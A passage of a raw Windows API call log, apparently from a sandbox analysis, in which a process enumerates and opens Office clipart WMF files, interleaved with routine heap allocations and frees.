hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.512] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.513] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.513] CloseHandle (hObject=0x27c) returned 1 [0102.513] AreFileApisANSI () returned 1 [0102.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.513] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 69 [0102.513] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.513] GetFileType (hFile=0x27c) returned 0x1 [0102.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.513] CloseHandle (hObject=0x27c) returned 1 [0102.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.513] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.513] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.514] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.514] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.515] AreFileApisANSI () returned 1 [0102.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0102.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF") returned 69 [0102.515] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00194_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00194_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf92)) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0102.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.515] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.515] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f86, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00195_.WMF", cAlternateFileName="")) returned 1 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.515] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0102.515] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0102.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0102.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0102.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0102.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.516] AreFileApisANSI () returned 1 [0102.516] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF", lpUsedDefaultChar=0x0) returned 69 [0102.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0102.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.516] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0102.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0102.516] AreFileApisANSI () returned 1 [0102.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 69 [0102.516] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.597] GetFileType (hFile=0x33c) returned 0x1 [0102.598] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.598] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0102.598] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0102.598] SetFilePointerEx (in: hFile=0x33c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0102.598] CloseHandle (hObject=0x33c) returned 1 [0102.598] AreFileApisANSI () returned 1 [0102.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.598] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0102.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 69 [0102.598] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x33c [0102.599] GetFileType (hFile=0x33c) returned 0x1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0102.599] CloseHandle (hObject=0x33c) returned 1 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.599] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.599] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.600] AreFileApisANSI () returned 1 [0102.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0102.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d528, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF") returned 69 [0102.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00195_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00195_.wmf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcdbb058, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1f86)) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0102.600] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0102.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.600] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.600] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcd6eb88, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcd6eb88, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcd6eb88, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2458, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="BL00234_.WMF", cAlternateFileName="")) returned 1 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0102.600] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.601] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0102.601] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0102.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.601] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.601] HeapFree (in: 